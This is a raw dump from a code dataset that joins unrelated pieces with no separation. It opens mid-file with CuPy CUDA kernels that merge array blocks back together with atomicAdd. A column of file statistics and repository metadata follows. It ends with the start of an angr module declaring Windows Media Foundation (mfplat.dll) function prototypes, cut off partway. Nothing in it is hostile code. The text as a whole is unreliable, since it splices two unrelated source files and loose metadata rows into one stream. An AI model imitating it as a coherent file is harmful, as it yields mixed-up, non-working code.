int input_idx[] = {b, nx, bx};
int output_idx[] = {b, ix};
atomicAdd(&output[output_idx], input[input_idx]);
}
""",
name='_blocks_to_array1_cuda')
_blocks_to_array1_cuda_complex = cp.ElementwiseKernel(
'raw T input, int32 batch_size, int32 Bx, int32 Sx, int32 Nx',
'raw T output',
"""
const int ndim = output.ndim;
int b = i / Bx / Nx;
i -= b * Bx * Nx;
int nx = i / Bx;
i -= nx * Bx;
int bx = i;
int ix = nx * Sx + bx;
if (ix < output.shape()[ndim - 1]) {
int input_idx[] = {b, nx, bx};
int output_idx[] = {b, ix};
atomicAdd(reinterpret_cast<T::value_type*>(&(output[output_idx])),
input[input_idx].real());
atomicAdd(
reinterpret_cast<T::value_type*>(&(output[output_idx])) + 1,
input[input_idx].imag());
}
""",
name='_blocks_to_array1_cuda_complex')
_blocks_to_array2_cuda = cp.ElementwiseKernel(
'raw T input, int32 batch_size, '
'int32 Bx, int32 By, int32 Sx, int32 Sy, '
'int32 Nx, int32 Ny',
'raw T output',
"""
const int ndim = output.ndim;
int b = i / Bx / By / Nx / Ny;
i -= b * Bx * By * Nx * Ny;
int ny = i / Bx / By / Nx;
i -= ny * Bx * By * Nx;
int nx = i / Bx / By;
i -= nx * Bx * By;
int by = i / Bx;
i -= by * Bx;
int bx = i;
int iy = ny * Sy + by;
int ix = nx * Sx + bx;
if (ix < output.shape()[ndim - 1] && iy < output.shape()[ndim - 2]) {
int input_idx[] = {b, ny, nx, by, bx};
int output_idx[] = {b, iy, ix};
atomicAdd(&output[output_idx], input[input_idx]);
}
""",
name='_blocks_to_array2_cuda')
_blocks_to_array2_cuda_complex = cp.ElementwiseKernel(
'raw T input, int32 batch_size, '
'int32 Bx, int32 By, int32 Sx, int32 Sy, '
'int32 Nx, int32 Ny',
'raw T output',
"""
const int ndim = output.ndim;
int b = i / Bx / By / Nx / Ny;
i -= b * Bx * By * Nx * Ny;
int ny = i / Bx / By / Nx;
i -= ny * Bx * By * Nx;
int nx = i / Bx / By;
i -= nx * Bx * By;
int by = i / Bx;
i -= by * Bx;
int bx = i;
int iy = ny * Sy + by;
int ix = nx * Sx + bx;
if (ix < output.shape()[ndim - 1] && iy < output.shape()[ndim - 2]) {
int input_idx[] = {b, ny, nx, by, bx};
int output_idx[] = {b, iy, ix};
atomicAdd(reinterpret_cast<T::value_type*>(&(output[output_idx])),
input[input_idx].real());
atomicAdd(
reinterpret_cast<T::value_type*>(&(output[output_idx])) + 1,
input[input_idx].imag());
}
""",
name='_blocks_to_array2_cuda_complex')
_blocks_to_array3_cuda = cp.ElementwiseKernel(
'raw T input, int32 batch_size, int32 Bx, int32 By, int32 Bz, '
'int32 Sx, int32 Sy, int32 Sz, int32 Nx, int32 Ny, int32 Nz',
'raw T output',
"""
const int ndim = output.ndim;
int b = i / Bx / By / Bz / Nx / Ny / Nz;
i -= b * Bx * By * Bz * Nx * Ny * Nz;
int nz = i / Bx / By / Bz / Nx / Ny;
i -= nz * Bx * By * Bz * Nx * Ny;
int ny = i / Bx / By / Bz / Nx;
i -= ny * Bx * By * Bz * Nx;
int nx = i / Bx / By / Bz;
i -= nx * Bx * By * Bz;
int bz = i / Bx / By;
i -= bz * Bx * By;
int by = i / Bx;
i -= by * Bx;
int bx = i;
int iz = nz * Sz + bz;
int iy = ny * Sy + by;
int ix = nx * Sx + bx;
if (ix < output.shape()[ndim - 1] &&
iy < output.shape()[ndim - 2] &&
iz < output.shape()[ndim - 3]) {
int input_idx[] = {b, nz, ny, nx, bz, by, bx};
int output_idx[] = {b, iz, iy, ix};
atomicAdd(&output[output_idx], input[input_idx]);
}
""",
name='_blocks_to_array3_cuda')
_blocks_to_array3_cuda_complex = cp.ElementwiseKernel(
'raw T input, int32 batch_size, int32 Bx, int32 By, int32 Bz, '
'int32 Sx, int32 Sy, int32 Sz, int32 Nx, int32 Ny, int32 Nz',
'raw T output',
"""
const int ndim = output.ndim;
int b = i / Bx / By / Bz / Nx / Ny / Nz;
i -= b * Bx * By * Bz * Nx * Ny * Nz;
int nz = i / Bx / By / Bz / Nx / Ny;
i -= nz * Bx * By * Bz * Nx * Ny;
int ny = i / Bx / By / Bz / Nx;
i -= ny * Bx * By * Bz * Nx;
int nx = i / Bx / By / Bz;
i -= nx * Bx * By * Bz;
int bz = i / Bx / By;
i -= bz * Bx * By;
int by = i / Bx;
i -= by * Bx;
int bx = i;
int iz = nz * Sz + bz;
int iy = ny * Sy + by;
int ix = nx * Sx + bx;
if (ix < output.shape()[ndim - 1] &&
iy < output.shape()[ndim - 2] &&
iz < output.shape()[ndim - 3]) {
int input_idx[] = {b, nz, ny, nx, bz, by, bx};
int output_idx[] = {b, iz, iy, ix};
atomicAdd(reinterpret_cast<T::value_type*>(&(output[output_idx])),
input[input_idx].real());
atomicAdd(reinterpret_cast<T::value_type*>(
&(output[output_idx])) + 1, input[input_idx].imag());
}
""",
name='_blocks_to_array3_cuda_complex')
_blocks_to_array4_cuda = cp.ElementwiseKernel(
'raw T input, int32 batch_size, '
'int32 Bx, int32 By, int32 Bz, int32 Bt, '
'int32 Sx, int32 Sy, int32 Sz, int32 St, '
'int32 Nx, int32 Ny, int32 Nz, int32 Nt',
'raw T output',
"""
const int ndim = output.ndim;
int b = i / Bx / By / Bz / Bt / Nx / Ny / Nz / Nt;
i -= b * Bx * By * Bz * Bt * Nx * Ny * Nz * Nt;
int nt = i / Bx / By / Bz / Bt / Nx / Ny / Nz;
i -= nt * Bx * By * Bz * Bt * Nx * Ny * Nz;
int nz = i / Bx / By / Bz / Bt / Nx / Ny;
i -= nz * Bx * By * Bz * Bt * Nx * Ny;
int ny = i / Bx / By / Bz / Bt / Nx;
i -= ny * Bx * By * Bz * Bt * Nx;
int nx = i / Bx / By / Bz / Bt;
i -= nx * Bx * By * Bz * Bt;
int bt = i / Bx / By / Bz;
i -= bt * Bx * By * Bz;
int bz = i / Bx / By;
i -= bz * Bx * By;
int by = i / Bx;
i -= by * Bx;
int bx = i;
int it = nt * St + bt;
int iz = nz * Sz + bz;
int iy = ny * Sy + by;
int ix = nx * Sx + bx;
if (ix < output.shape()[ndim - 1] &&
iy < output.shape()[ndim - 2] &&
iz < output.shape()[ndim - 3] &&
it < output.shape()[ndim - 4]) {
int input_idx[] = {b, nt, nz, ny, nx, bt, bz, by, bx};
int output_idx[] = {b, it, iz, iy, ix};
atomicAdd(&output[output_idx], input[input_idx]);
}
""",
name='_blocks_to_array4_cuda')
_blocks_to_array4_cuda_complex = cp.ElementwiseKernel(
'raw T input, int32 batch_size, '
'int32 Bx, int32 By, int32 Bz, int32 Bt, '
'int32 Sx, int32 Sy, int32 Sz, int32 St, '
'int32 Nx, int32 Ny, int32 Nz, int32 Nt',
'raw T output',
"""
const int ndim = output.ndim;
int b = i / Bx / By / Bz / Bt / Nx / Ny / Nz / Nt;
i -= b * Bx * By * Bz * Bt * Nx * Ny * Nz * Nt;
int nt = i / Bx / By / Bz / Bt / Nx / Ny / Nz;
i -= nt * Bx * By * Bz * Bt * Nx * Ny * Nz;
int nz = i / Bx / By / Bz / Bt / Nx / Ny;
i -= nz * Bx * By * Bz * Bt * Nx * Ny;
int ny = i / Bx / By / Bz / Bt / Nx;
i -= ny * Bx * By * Bz * Bt * Nx;
int nx = i / Bx / By / Bz / Bt;
i -= nx * Bx * By * Bz * Bt;
int bt = i / Bx / By / Bz;
i -= bt * Bx * By * Bz;
int bz = i / Bx / By;
i -= bz * Bx * By;
int by = i / Bx;
i -= by * Bx;
int bx = i;
int it = nt * St + bt;
int iz = nz * Sz + bz;
int iy = ny * Sy + by;
int ix = nx * Sx + bx;
if (ix < output.shape()[ndim - 1] &&
iy < output.shape()[ndim - 2] &&
iz < output.shape()[ndim - 3] &&
it < output.shape()[ndim - 4]) {
int input_idx[] = {b, nt, nz, ny, nx, bt, bz, by, bx};
int output_idx[] = {b, it, iz, iy, ix};
atomicAdd(reinterpret_cast<T::value_type*>(&(output[output_idx])),
input[input_idx].real());
atomicAdd(reinterpret_cast<T::value_type*>(
&(output[output_idx])) + 1, input[input_idx].imag());
}
""",
name='_blocks_to_array4_cuda_complex')
| 40.8125
| 79
| 0.38464
| 3,947
| 34,609
| 3.216114
| 0.035977
| 0.060501
| 0.030251
| 0.020167
| 0.930833
| 0.903813
| 0.89885
| 0.874902
| 0.869072
| 0.859146
| 0
| 0.031634
| 0.498541
| 34,609
| 847
| 80
| 40.860685
| 0.699798
| 0.03424
| 0
| 0.722458
| 0
| 0
| 0.081119
| 0.012813
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021186
| false
| 0
| 0.008475
| 0
| 0.033898
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1247081add64badc149af8da67683a988746de63
| 111,647
|
py
|
Python
|
angr/procedures/definitions/win32_mfplat.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_mfplat.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_mfplat.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("mfplat.dll")
prototypes = \
{
#
'MFSerializeAttributesToStream': SimTypeFunction([SimTypeBottom(label="IMFAttributes"), SimTypeInt(signed=False, label="UInt32"), SimTypeBottom(label="IStream")], SimTypeInt(signed=True, label="Int32"), arg_names=["pAttr", "dwOptions", "pStm"]),
#
'MFDeserializeAttributesFromStream': SimTypeFunction([SimTypeBottom(label="IMFAttributes"), SimTypeInt(signed=False, label="UInt32"), SimTypeBottom(label="IStream")], SimTypeInt(signed=True, label="Int32"), arg_names=["pAttr", "dwOptions", "pStm"]),
#
'MFCreateTransformActivate': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IMFActivate"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ppActivate"]),
#
'MFCreateSourceResolver': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IMFSourceResolver"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ppISourceResolver"]),
#
'CreatePropertyStore': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IPropertyStore"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ppStore"]),
#
'MFGetSupportedSchemes': SimTypeFunction([SimTypePointer(SimStruct({"Anonymous": SimUnion({"Anonymous": SimStruct({"vt": SimTypeShort(signed=False, label="UInt16"), "wReserved1": SimTypeShort(signed=False, label="UInt16"), "wReserved2": SimTypeShort(signed=False, label="UInt16"), "wReserved3": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"cVal": SimTypeBottom(label="CHAR"), "bVal": SimTypeChar(label="Byte"), "iVal": SimTypeShort(signed=True, label="Int16"), "uiVal": SimTypeShort(signed=False, label="UInt16"), "lVal": SimTypeInt(signed=True, label="Int32"), "ulVal": SimTypeInt(signed=False, label="UInt32"), "intVal": SimTypeInt(signed=True, label="Int32"), "uintVal": SimTypeInt(signed=False, label="UInt32"), "hVal": SimTypeBottom(label="LARGE_INTEGER"), "uhVal": SimTypeBottom(label="ULARGE_INTEGER"), "fltVal": SimTypeFloat(size=32), "dblVal": SimTypeFloat(size=64), "boolVal": SimTypeShort(signed=True, label="Int16"), "__OBSOLETE__VARIANT_BOOL": SimTypeShort(signed=True, label="Int16"), "scode": SimTypeInt(signed=True, label="Int32"), "cyVal": SimTypeBottom(label="CY"), "date": SimTypeFloat(size=64), "filetime": SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), "puuid": SimTypePointer(SimTypeBottom(label="Guid"), offset=0), "pclipdata": SimTypePointer(SimTypeBottom(label="CLIPDATA"), offset=0), "bstrVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "bstrblobVal": SimTypeBottom(label="BSTRBLOB"), "blob": SimTypeBottom(label="BLOB"), "pszVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "pwszVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "punkVal": SimTypeBottom(label="IUnknown"), "pdispVal": SimTypeBottom(label="IDispatch"), "pStream": SimTypeBottom(label="IStream"), "pStorage": SimTypeBottom(label="IStorage"), "pVersionedStream": SimTypePointer(SimStruct({"guidVersion": SimTypeBottom(label="Guid"), "pStream": SimTypeBottom(label="IStream")}, name="VERSIONEDSTREAM", pack=False, align=None), offset=0), "parray": SimTypePointer(SimTypeBottom(label="SAFEARRAY"), offset=0), "cac": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CAC", pack=False, align=None), "caub": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CAUB", pack=False, align=None), "cai": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0)}, name="CAI", pack=False, align=None), "caui": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)}, name="CAUI", pack=False, align=None), "cal": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)}, name="CAL", pack=False, align=None), "caul": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="CAUL", pack=False, align=None), "cah": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="LARGE_INTEGER"), offset=0)}, name="CAH", pack=False, align=None), "cauh": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="ULARGE_INTEGER"), offset=0)}, name="CAUH", pack=False, align=None), "caflt": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeFloat(size=32), offset=0)}, name="CAFLT", pack=False, align=None), "cadbl": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeFloat(size=64), offset=0)}, name="CADBL", pack=False, align=None), "cabool": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0)}, name="CABOOL", pack=False, align=None), "cascode": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)}, name="CASCODE", pack=False, align=None), "cacy": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="CY"), offset=0)}, name="CACY", pack=False, align=None), "cadate": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeFloat(size=64), offset=0)}, name="CADATE", pack=False, align=None), "cafiletime": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), offset=0)}, name="CAFILETIME", pack=False, align=None), "cauuid": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="Guid"), offset=0)}, name="CACLSID", pack=False, align=None), "caclipdata": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="CLIPDATA"), offset=0)}, name="CACLIPDATA", pack=False, align=None), "cabstr": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)}, name="CABSTR", pack=False, align=None), "cabstrblob": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="BSTRBLOB"), offset=0)}, name="CABSTRBLOB", pack=False, align=None), "calpstr": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypePointer(SimTypeChar(label="Byte"), offset=0), offset=0)}, name="CALPSTR", pack=False, align=None), "calpwstr": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)}, name="CALPWSTR", pack=False, align=None), "capropvar": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="PROPVARIANT"), offset=0)}, name="CAPROPVARIANT", pack=False, align=None), "pcVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "pbVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "piVal": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0), "puiVal": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0), "plVal": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "pulVal": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), "pintVal": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "puintVal": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), "pfltVal": SimTypePointer(SimTypeFloat(size=32), offset=0), "pdblVal": SimTypePointer(SimTypeFloat(size=64), offset=0), "pboolVal": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0), "pdecVal": SimTypePointer(SimTypeBottom(label="DECIMAL"), offset=0), "pscode": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "pcyVal": SimTypePointer(SimTypeBottom(label="CY"), offset=0), "pdate": SimTypePointer(SimTypeFloat(size=64), offset=0), "pbstrVal": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), "ppunkVal": SimTypePointer(SimTypeBottom(label="IUnknown"), offset=0), "ppdispVal": SimTypePointer(SimTypeBottom(label="IDispatch"), offset=0), "pparray": SimTypePointer(SimTypePointer(SimTypeBottom(label="SAFEARRAY"), offset=0), offset=0), "pvarVal": SimTypePointer(SimTypeBottom(label="PROPVARIANT"), offset=0)}, name="<anon>", label="None")}, name="_Anonymous_e__Struct", pack=False, align=None), "decVal": SimTypeBottom(label="DECIMAL")}, name="<anon>", label="None")}, name="PROPVARIANT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pPropVarSchemeArray"]),
#
'MFGetSupportedMimeTypes': SimTypeFunction([SimTypePointer(SimStruct({"Anonymous": SimUnion({"Anonymous": SimStruct({"vt": SimTypeShort(signed=False, label="UInt16"), "wReserved1": SimTypeShort(signed=False, label="UInt16"), "wReserved2": SimTypeShort(signed=False, label="UInt16"), "wReserved3": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"cVal": SimTypeBottom(label="CHAR"), "bVal": SimTypeChar(label="Byte"), "iVal": SimTypeShort(signed=True, label="Int16"), "uiVal": SimTypeShort(signed=False, label="UInt16"), "lVal": SimTypeInt(signed=True, label="Int32"), "ulVal": SimTypeInt(signed=False, label="UInt32"), "intVal": SimTypeInt(signed=True, label="Int32"), "uintVal": SimTypeInt(signed=False, label="UInt32"), "hVal": SimTypeBottom(label="LARGE_INTEGER"), "uhVal": SimTypeBottom(label="ULARGE_INTEGER"), "fltVal": SimTypeFloat(size=32), "dblVal": SimTypeFloat(size=64), "boolVal": SimTypeShort(signed=True, label="Int16"), "__OBSOLETE__VARIANT_BOOL": SimTypeShort(signed=True, label="Int16"), "scode": SimTypeInt(signed=True, label="Int32"), "cyVal": SimTypeBottom(label="CY"), "date": SimTypeFloat(size=64), "filetime": SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), "puuid": SimTypePointer(SimTypeBottom(label="Guid"), offset=0), "pclipdata": SimTypePointer(SimTypeBottom(label="CLIPDATA"), offset=0), "bstrVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "bstrblobVal": SimTypeBottom(label="BSTRBLOB"), "blob": SimTypeBottom(label="BLOB"), "pszVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "pwszVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "punkVal": SimTypeBottom(label="IUnknown"), "pdispVal": SimTypeBottom(label="IDispatch"), "pStream": SimTypeBottom(label="IStream"), "pStorage": SimTypeBottom(label="IStorage"), "pVersionedStream": SimTypePointer(SimStruct({"guidVersion": SimTypeBottom(label="Guid"), "pStream": SimTypeBottom(label="IStream")}, name="VERSIONEDSTREAM", pack=False, align=None), offset=0), "parray": SimTypePointer(SimTypeBottom(label="SAFEARRAY"), offset=0), "cac": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CAC", pack=False, align=None), "caub": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CAUB", pack=False, align=None), "cai": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0)}, name="CAI", pack=False, align=None), "caui": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)}, name="CAUI", pack=False, align=None), "cal": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)}, name="CAL", pack=False, align=None), "caul": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="CAUL", pack=False, align=None), "cah": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="LARGE_INTEGER"), offset=0)}, name="CAH", pack=False, align=None), "cauh": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="ULARGE_INTEGER"), offset=0)}, name="CAUH", pack=False, align=None), "caflt": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeFloat(size=32), offset=0)}, name="CAFLT", pack=False, align=None), "cadbl": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeFloat(size=64), offset=0)}, name="CADBL", pack=False, align=None), "cabool": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0)}, name="CABOOL", pack=False, align=None), "cascode": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)}, name="CASCODE", pack=False, align=None), "cacy": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="CY"), offset=0)}, name="CACY", pack=False, align=None), "cadate": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeFloat(size=64), offset=0)}, name="CADATE", pack=False, align=None), "cafiletime": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), offset=0)}, name="CAFILETIME", pack=False, align=None), "cauuid": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="Guid"), offset=0)}, name="CACLSID", pack=False, align=None), "caclipdata": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="CLIPDATA"), offset=0)}, name="CACLIPDATA", pack=False, align=None), "cabstr": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)}, name="CABSTR", pack=False, align=None), "cabstrblob": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="BSTRBLOB"), offset=0)}, name="CABSTRBLOB", pack=False, align=None), "calpstr": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypePointer(SimTypeChar(label="Byte"), offset=0), offset=0)}, name="CALPSTR", pack=False, align=None), "calpwstr": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)}, name="CALPWSTR", pack=False, align=None), "capropvar": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="PROPVARIANT"), offset=0)}, name="CAPROPVARIANT", pack=False, align=None), "pcVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "pbVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "piVal": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0), "puiVal": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0), "plVal": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "pulVal": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), "pintVal": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "puintVal": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), "pfltVal": SimTypePointer(SimTypeFloat(size=32), offset=0), "pdblVal": SimTypePointer(SimTypeFloat(size=64), offset=0), "pboolVal": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0), "pdecVal": SimTypePointer(SimTypeBottom(label="DECIMAL"), offset=0), "pscode": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "pcyVal": SimTypePointer(SimTypeBottom(label="CY"), offset=0), "pdate": SimTypePointer(SimTypeFloat(size=64), offset=0), "pbstrVal": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), "ppunkVal": SimTypePointer(SimTypeBottom(label="IUnknown"), offset=0), "ppdispVal": SimTypePointer(SimTypeBottom(label="IDispatch"), offset=0), "pparray": SimTypePointer(SimTypePointer(SimTypeBottom(label="SAFEARRAY"), offset=0), offset=0), "pvarVal": SimTypePointer(SimTypeBottom(label="PROPVARIANT"), offset=0)}, name="<anon>", label="None")}, name="_Anonymous_e__Struct", pack=False, align=None), "decVal": SimTypeBottom(label="DECIMAL")}, name="<anon>", label="None")}, name="PROPVARIANT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pPropVarMimeTypeArray"]),
#
'MFGetSystemTime': SimTypeFunction([], SimTypeLongLong(signed=True, label="Int64")),
#
'MFCreateSystemTimeSource': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IMFPresentationTimeSource"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ppSystemTimeSource"]),
#
'MFCreatePresentationDescriptor': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="IMFStreamDescriptor"), label="LPArray", offset=0), SimTypePointer(SimTypeBottom(label="IMFPresentationDescriptor"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["cStreamDescriptors", "apStreamDescriptors", "ppPresentationDescriptor"]),
#
'MFSerializePresentationDescriptor': SimTypeFunction([SimTypeBottom(label="IMFPresentationDescriptor"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Byte"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pPD", "pcbData", "ppbData"]),
#
'MFDeserializePresentationDescriptor': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeBottom(label="IMFPresentationDescriptor"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["cbData", "pbData", "ppPD"]),
#
'MFCreateStreamDescriptor': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="IMFMediaType"), label="LPArray", offset=0), SimTypePointer(SimTypeBottom(label="IMFStreamDescriptor"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["dwStreamIdentifier", "cMediaTypes", "apMediaTypes", "ppDescriptor"]),
#
